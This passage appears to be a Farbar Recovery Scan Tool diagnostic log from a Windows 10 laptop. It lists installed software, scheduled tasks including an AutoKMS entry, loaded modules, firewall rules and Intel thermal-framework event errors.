Catalyst Control Center Next Localization RU (HKLM\...\{E2D25167-8913-E00E-6755-270D9010DF62}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization SV (HKLM\...\{4BE67694-29C6-6A69-85E4-D06EFCA12846}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TH (HKLM\...\{7B1A228A-7D97-3209-B386-AA878D3555C5}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization TR (HKLM\...\{54603A0D-55EB-44D8-0D79-4B7CB94AD6B7}) (Version: 2017.0720.1902.32426 - Advanced Micro Devices, Inc.) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.40.2.0131 - DT Soft Ltd)
Dell Touchpad (HKLM\...\SynTPDeinstKey) (Version: 19.2.17.45 - Synaptics Incorporated)
Dungeons & Dragons Online® (HKLM\...\Steam App 206480) (Version:  - Standing Stone Games, LLC)
Evolve Stage 2 (HKLM\...\Steam App 273350) (Version:  - Turtle Rock Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 60.0.3112.113 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Intel® Chipset Device Software (HKLM-x32\...\{61a0f1f5-c77e-4992-ba85-029f93cd8d18}) (Version: 10.1.1.27 - Intel® Corporation) Hidden
Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.2.10900.330 - Intel Corporation)
Intel® HID Event Filter (HKLM-x32\...\3FB06EEC-013D-4366-9918-71B97DFB84EB) (Version: 1.1.0.313 - Intel Corporation)
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.5.0.1020 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 21.20.16.4574 - Intel Corporation)
Intel® Serial IO (HKLM\...\{9FD91C5C-44AE-4D9D-85BE-AE52816B0294}) (Version: 30.63.1603.5 - Intel Corporation)
Java 8 Update 144 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180144F0}) (Version: 8.0.1440.1 - Oracle Corporation)
Java SE Development Kit 8 Update 144 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180144}) (Version: 8.0.1440.1 - Oracle Corporation)
Maxx Audio Installer (x64) (HKLM\...\{307032B2-6AF2-46D7-B933-62438DEB2B9A}) (Version: 2.7.8942.2 - Waves Audio Ltd.) Hidden
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\OneDriveSetup.exe) (Version: 17.3.6966.0824 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.50727 (HKLM-x32\...\{15134cb0-b767-4960-a911-f2d16ae54797}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24123 (HKLM-x32\...\{206898cc-4b41-4d98-ac28-9f9ae57f91fe}) (Version: 14.0.24123.0 - Microsoft Corporation)
Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0 - Mozilla)
OEM Application Profile (HKLM-x32\...\{B4B7FD8F-06FC-E277-4F29-8F75F8281D8F}) (Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
PlanetSide 2 (HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\DG0-PlanetSide 2) (Version:  - Sony Online Entertainment)
PX Profile Update (HKLM-x32\...\{92EF4CD3-1423-7E68-2568-14F9D0D8930B}) (Version: 1.00.1. - AMD) Hidden
Qualcomm Atheros 11ac Wireless LAN&Bluetooth Installer (HKLM-x32\...\{E7086B15-806E-4519-A876-DBA9FDDE9A13}) (Version: 11.0.0.10334 - Qualcomm Atheros)
QuickSet64 (HKLM\...\{87CF757E-C1F1-4D22-865C-00C6950B5258}) (Version: 11.1.38 - Dell Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.14393.31228 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7989 - Realtek Semiconductor Corp.)
SecondLifeViewer (HKLM-x32\...\SecondLifeViewer) (Version: 5.0.6.326593 - Linden Research, Inc.)
Synaptics WBF DDK 5111 (VSM) (HKLM\...\{DC5A22ED-3DF4-43F0-BC5F-805DB8E6D7E3}) (Version: 4.5.289.0 - Synaptics)
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Vulkan Run Time Libraries 1.0.26.0 (HKLM\...\VulkanRT1.0.26.0) (Version: 1.0.26.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.33.0 (HKLM\...\VulkanRT1.0.33.0) (Version: 1.0.33.0 - LunarG, Inc.)
Vulkan Run Time Libraries 1.0.51.0 (HKLM\...\VulkanRT1.0.51.0) (Version: 1.0.51.0 - LunarG, Inc.)
WinRAR archiver (HKLM-x32\...\WinRAR archiver) (Version:  - )
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1238717651-3256879073-989753507-1001_Classes\CLSID\{a9872fee-5a55-4ecb-9b0f-b06fedcf14d1}\localserver32 -> C:\Program Files\Waves\MaxxAudio\MaxxAudioPro.exe (Waves Audio Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2005-06-08] ()
ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2005-06-08] ()
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-07-21] (Advanced Micro Devices, Inc.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\Windows\system32\igfxDTCM.dll [2017-08-05] (Intel Corporation)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2005-06-08] ()
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {0427824D-891C-4C2E-B96C-07EE0C9E0E9F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-05] (Google Inc.)
Task: {38D5C261-651E-4059-BD66-8BA42A06C34F} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-20] (Adobe Systems Incorporated)
Task: {3F6E048D-6404-433B-8F5F-CFF4D89BF89E} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => %windir%\system32\rundll32.exe generaltel.dll,RunTelemetryW
Task: {4C9603C5-CFC2-4883-A798-936E1293795E} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-07-21] (Advanced Micro Devices, Inc.)
Task: {7B5E9FCC-D4DD-4F1C-BFC0-5DAAE963D108} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2017-08-05] ()
Task: {7E485A1A-37CB-4716-9AC3-94A27BEF2313} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-08-05] (Google Inc.)
Task: {9DCE3756-B0D7-44EF-BF3B-AD03523175D5} - System32\Tasks\RtHDVBg_PushButton => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2017-08-05] (Realtek Semiconductor)
Task: {E46F89C4-AAF1-4A8A-8423-FBFA130BCB69} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-06-15] (Intel® Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 

==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 

==================== Loaded Modules (Whitelisted) ==============
 
2017-08-05 06:47 - 2015-07-15 07:34 - 000032768 _____ () C:\Windows\SYSTEM32\licensemanagerapi.dll
2017-08-12 11:15 - 2017-08-12 11:15 - 000022016 _____ () C:\Windows\System32\xrxs1l6.dll
2017-08-05 08:01 - 2016-10-25 12:45 - 000404480 _____ () C:\Windows\System32\diagtrack_wininternal.dll
2017-08-26 11:04 - 2017-09-01 08:41 - 000103736 _____ () C:\Windows\SysWOW64\PnkBstrB.exe
2017-08-26 11:04 - 2017-09-01 08:40 - 000066872 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2017-08-05 08:02 - 2017-06-03 19:09 - 002495776 _____ () C:\Windows\system32\CoreUIComponents.dll
2017-08-05 08:00 - 2015-09-17 11:18 - 000429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2017-08-05 08:03 - 2017-04-28 05:14 - 006569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-08-05 08:00 - 2016-11-19 11:36 - 000471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-08-05 08:03 - 2017-04-28 05:12 - 001808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-08-05 08:03 - 2015-09-17 11:13 - 002274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-09-13 12:13 - 2016-09-13 12:13 - 000014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-13 12:13 - 2016-09-13 12:13 - 000739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-13 12:13 - 2016-09-13 12:13 - 000014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-13 12:13 - 2016-09-13 12:13 - 000071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-13 12:12 - 2016-09-13 12:12 - 000011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-13 12:12 - 2016-09-13 12:12 - 002013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-13 12:13 - 2016-09-13 12:13 - 000191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2017-08-05 08:00 - 2016-08-03 10:17 - 000293376 _____ () C:\Windows\SYSTEM32\textinputframework.dll
2016-07-19 03:44 - 2016-07-19 03:44 - 001243936 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 

==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 

==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 

==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\.DEFAULT\...\ncode.in -> hxxps://www.ncode.in
IE trusted site: HKU\.DEFAULT\...\ncodesolutions.com -> hxxps://www.ncodesolutions.com
IE trusted site: HKU\.DEFAULT\...\npay.in -> hxxps://www.npay.in
IE trusted site: HKU\.DEFAULT\...\nprocure.com -> hxxps://nprocure.com
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-10 16:34 - 2015-07-10 16:32 - 000000824 _____ C:\Windows\system32\Drivers\etc\hosts
 

==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Admin\Desktop\IMG_98556.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKU\S-1-5-21-1238717651-3256879073-989753507-1001\...\StartupApproved\Run: => "OneDrive"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [{17E30FEF-899A-4DF1-B2A2-39DA59CBFF12}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{4E0D7B7E-F8B8-48DA-88C7-9F88F3CDB23E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{248441FB-636A-499F-B72D-BE07F2F0480A}] => (Allow) D:\New folder (2)\New folder\Steam.exe
FirewallRules: [{1FC5FCA6-C33C-4E7C-B115-3DAB4E707048}] => (Allow) D:\New folder (2)\New folder\Steam.exe
FirewallRules: [{FE451A7F-4088-4B53-AD9C-510BBEF3C904}] => (Allow) D:\New folder (2)\New folder\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{45C49214-FE0B-4283-AD9E-ACC950CD35EB}] => (Allow) D:\New folder (2)\New folder\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{480768A8-0C1D-4DBC-AFD4-81606D8F05AA}] => (Allow) D:\New folder (2)\New folder\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [{13080431-BD99-4FD1-888E-06EFD7FCFCC2}] => (Allow) D:\New folder (2)\New folder\steamapps\common\dota 2 beta\game\bin\win64\dota2.exe
FirewallRules: [TCP Query User{D2A397EB-6E94-4929-AF02-95C4F6693746}D:\intellij idea community edition 2017.2\bin\idea64.exe] => (Block) D:\intellij idea community edition 2017.2\bin\idea64.exe
FirewallRules: [UDP Query User{7966F533-2A09-4E13-8187-913446497624}D:\intellij idea community edition 2017.2\bin\idea64.exe] => (Block) D:\intellij idea community edition 2017.2\bin\idea64.exe
FirewallRules: [TCP Query User{45619C7F-9637-4AAE-B418-0A75A16D5FBC}D:\cod 4\iw3mp.exe] => (Allow) D:\cod 4\iw3mp.exe
FirewallRules: [UDP Query User{84C1824E-3A98-45A1-BBC5-80407DFC91DB}D:\cod 4\iw3mp.exe] => (Allow) D:\cod 4\iw3mp.exe
FirewallRules: [TCP Query User{C15A1497-41D2-4389-A59E-4E101AF82CA9}D:\cod 4\iw3mp.exe] => (Allow) D:\cod 4\iw3mp.exe
FirewallRules: [UDP Query User{56C8E703-AB34-4B2A-B8A1-C4C5D19A99BD}D:\cod 4\iw3mp.exe] => (Allow) D:\cod 4\iw3mp.exe
FirewallRules: [TCP Query User{D1B620D4-687A-434F-B53F-D7DD84A0A130}D:\cod\cod2mp_s.exe] => (Allow) D:\cod\cod2mp_s.exe
FirewallRules: [UDP Query User{4496A89E-05B5-4679-AD52-8C6B9C385434}D:\cod\cod2mp_s.exe] => (Allow) D:\cod\cod2mp_s.exe
FirewallRules: [TCP Query User{F55D59E6-944D-4463-82F2-A6964C6FE489}D:\new folder (2)\secondlifeviewer\slvoice.exe] => (Allow) D:\new folder (2)\secondlifeviewer\slvoice.exe
FirewallRules: [UDP Query User{CD7B5C33-6C2F-43E2-A8EC-26B35187A733}D:\new folder (2)\secondlifeviewer\slvoice.exe] => (Allow) D:\new folder (2)\secondlifeviewer\slvoice.exe
FirewallRules: [TCP Query User{394E1D49-5796-4621-945F-ACE0277A6931}D:\cod\cod2mp_s.exe] => (Allow) D:\cod\cod2mp_s.exe
FirewallRules: [UDP Query User{6F9A590D-F457-46FC-8C9E-300CD7D649D1}D:\cod\cod2mp_s.exe] => (Allow) D:\cod\cod2mp_s.exe
FirewallRules: [{A8A1B218-3DF7-4351-B46B-36CE14DAF21F}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\SteamLauncher.exe
FirewallRules: [{384209ED-C719-499D-86A9-5F734B60E431}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\SteamLauncher.exe
FirewallRules: [{2E9B1F63-50DD-4854-86E7-07A2CB9BB73E}] => (Allow) C:\Users\Admin\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{6516C458-F5D5-4E3C-ABE9-085B175E0A3F}] => (Allow) C:\Users\Admin\AppData\Roaming\BitTorrent\BitTorrent.exe
FirewallRules: [{FF6252D1-84E0-4F48-B2C6-2D7651E773EA}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [{1CBDF46B-00B4-4DAA-B83E-A11364084AB6}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [TCP Query User{557A59B8-1B9F-4D0D-BA6D-1FB556335C79}D:\intellij idea community edition 2017.2\bin\idea64.exe] => (Block) D:\intellij idea community edition 2017.2\bin\idea64.exe
FirewallRules: [UDP Query User{D4B4C37A-9F76-4426-AB5B-2D66DD85FAC8}D:\intellij idea community edition 2017.2\bin\idea64.exe] => (Block) D:\intellij idea community edition 2017.2\bin\idea64.exe
FirewallRules: [{5E3BDFE5-B496-4979-B82E-3BC18A0D5DD3}] => (Allow) D:\New folder (2)\New folder\steamapps\common\EvolveGame\bin64_SteamRetail\Evolve.exe
FirewallRules: [{76951B1F-B9D1-4DBC-AFE0-CFFD8234EEF5}] => (Allow) D:\New folder (2)\New folder\steamapps\common\EvolveGame\bin64_SteamRetail\Evolve.exe
FirewallRules: [{5509C818-49DE-4C2A-9D64-79B87350C484}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{759B86D3-03E9-425A-99BC-416E41974886}D:\new folder (2)\new folder\steamapps\common\cod 4\iw3mp.exe] => (Allow) D:\new folder (2)\new folder\steamapps\common\cod 4\iw3mp.exe
FirewallRules: [UDP Query User{5B590641-FBE0-46BB-B057-11568C6818B4}D:\new folder (2)\new folder\steamapps\common\cod 4\iw3mp.exe] => (Allow) D:\new folder (2)\new folder\steamapps\common\cod 4\iw3mp.exe
FirewallRules: [TCP Query User{8BA05FCF-63B4-423D-B9A8-8C7461ECBCD0}D:\new folder (2)\new folder\steamapps\common\argo\argo_x64.exe] => (Block) D:\new folder (2)\new folder\steamapps\common\argo\argo_x64.exe
FirewallRules: [UDP Query User{5DF0DAF9-5C45-4F77-AF0A-3F7AB2E688FE}D:\new folder (2)\new folder\steamapps\common\argo\argo_x64.exe] => (Block) D:\new folder (2)\new folder\steamapps\common\argo\argo_x64.exe
FirewallRules: [{B5C21A9E-DB11-4F7B-A536-1B8BF9AA34BF}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{5C475647-D5A6-46DD-900C-82F133D9BB58}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{BD967804-A82E-4AAA-8FB6-1ABB2F8DDB12}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{40C62935-BE7C-4539-B3D3-4E2CA03F1ED0}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{4C44E0D2-70F7-48AC-8679-DAB20EEE97DF}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{7D8EC086-C8B0-49C1-9647-F1F5EB4F5486}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{03401570-C2C7-4EB8-AF11-9B81B772D1DA}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{AC0C17EF-8D3C-472C-923D-16336426DDF1}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{10AD4F33-7992-4BCB-9BA8-F945C26DCDD7}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Dungeons and Dragons Online\TurbineInvoker.exe
FirewallRules: [{6C73507C-C233-4426-84DF-D2E6CADADB65}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Dungeons and Dragons Online\TurbineInvoker.exe
FirewallRules: [TCP Query User{0E71304B-21EF-4955-AB00-C51C5F16378C}D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe] => (Allow) D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe
FirewallRules: [UDP Query User{26E16434-9219-48D7-A23A-4F215922D6D5}D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe] => (Allow) D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe
FirewallRules: [TCP Query User{C2735E07-FD60-42B0-8796-3759708D0783}D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe] => (Block) D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe
FirewallRules: [UDP Query User{5D0E937E-6128-45C2-9D39-72F51CD34227}D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe] => (Block) D:\new folder (2)\new folder\steamapps\common\dungeons and dragons online\dndclient.exe
FirewallRules: [{6726B215-D9CB-4090-B751-F5237FDED3D3}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [{FD1E7932-44B0-4B5B-9EEF-A1712B6AF7F1}] => (Allow) D:\New folder (2)\New folder\steamapps\common\Black Squad\binaries\win32\BlackSquadGame.exe
FirewallRules: [{4EF81584-0681-453A-BA61-72F346867961}] => (Allow) C:\Users\Admin\Desktop\Steam.exe
FirewallRules: [{234BC233-4830-4E04-B880-F9A14E228E2E}] => (Allow) C:\Users\Admin\Desktop\Steam.exe
FirewallRules: [{870F9035-40EC-4828-8616-F6CA4A6F4AA0}] => (Allow) C:\Users\Admin\Desktop\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{493FD20F-9DFE-446F-9E3A-5DE43DF22D9A}] => (Allow) C:\Users\Admin\Desktop\bin\cef\cef.win7\steamwebhelper.exe
 
==================== Restore Points =========================
 

==================== Faulty Device Manager Devices =============
 

==================== Event log errors: =========================
 
Application errors:
==================
Error: (09/20/2017 10:43:05 AM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.2.11000.2996) TYPE: ERROR MODULE: DPTF TIME 141117683 ms
 
DPTF Build Version:  8.2.11000.2996
DPTF Build Date:  Aug 10 2016 11:44:33
Source File:  ..\..\..\..\Sources\Policies\ConfigTdpPolicy\ConfigTdpPolicy.cpp @ line 152
Executing Function:  ConfigTdpPolicy::onBindDomain
Message:  ConfigTdp not supported.
Participant:  TCPU [0]
Domain:  PKG [0]
Policy:  ConfigTDP Policy [0]
 
Error: (09/20/2017 10:43:05 AM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.2.11000.2996) TYPE: ERROR MODULE: DPTF TIME 141117678 ms
 
DPTF Build Version:  8.2.11000.2996
DPTF Build Date:  Aug 10 2016 11:44:33
Source File:  ..\..\..\..\Sources\Policies\ConfigTdpPolicy\ConfigTdpPolicy.cpp @ line 330
Executing Function:  ConfigTdpPolicy::synchronizeConfigTdpPlatformSettings
Message:  ConfigTdp not supported.
Policy:  ConfigTDP Policy [0]
 
Error: (09/20/2017 10:14:41 AM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.2.11000.2996) TYPE: ERROR MODULE: DPTF TIME 139413372 ms
 
DPTF Build Version:  8.2.11000.2996
DPTF Build Date:  Aug 10 2016 11:44:33
Source File:  ..\..\..\..\Sources\Policies\ConfigTdpPolicy\ConfigTdpPolicy.cpp @ line 152
Executing Function:  ConfigTdpPolicy::onBindDomain
Message:  ConfigTdp not supported.
Participant:  TCPU [0]
Domain:  PKG [0]
Policy:  ConfigTDP Policy [0]
 
Error: (09/20/2017 10:14:41 AM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.2.11000.2996) TYPE: ERROR MODULE: DPTF TIME 139413370 ms
 
DPTF Build Version:  8.2.11000.2996
DPTF Build Date:  Aug 10 2016 11:44:33
Source File:  ..\..\..\..\Sources\Policies\ConfigTdpPolicy\ConfigTdpPolicy.cpp @ line 330
Executing Function:  ConfigTdpPolicy::synchronizeConfigTdpPlatformSettings
Message:  ConfigTdp not supported.
Policy:  ConfigTDP Policy [0]
 
Error: (09/19/2017 08:40:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-PL742CC)
Description: Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (09/19/2017 08:10:36 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-PL742CC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (09/19/2017 08:10:36 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-PL742CC)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (09/19/2017 08:05:05 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: DESKTOP-PL742CC)
Description: microsoft.windows.authhost.a_8wekyb3d8bbwe3
 
Error: (09/19/2017 08:04:52 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: DESKTOP-PL742CC)
Description: microsoft.windows.authhost.a_8wekyb3d8bbwe3
 
Error: (09/19/2017 07:54:02 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.2.11000.2996) TYPE: ERROR MODULE: DPTF TIME 87760621 ms
 
DPTF Build Version:  8.2.11000.2996
DPTF Build Date:  Aug 10 2016 11:44:33
Source File:  ..\..\..\..\Sources\Policies\ConfigTdpPolicy\ConfigTdpPolicy.cpp @ line 152
Executing Function:  ConfigTdpPolicy::onBindDomain
Message:  ConfigTdp not supported.
Participant:  TCPU [0]
Domain:  PKG [0]
Policy:  ConfigTDP Policy [0]
 

System errors:
=============
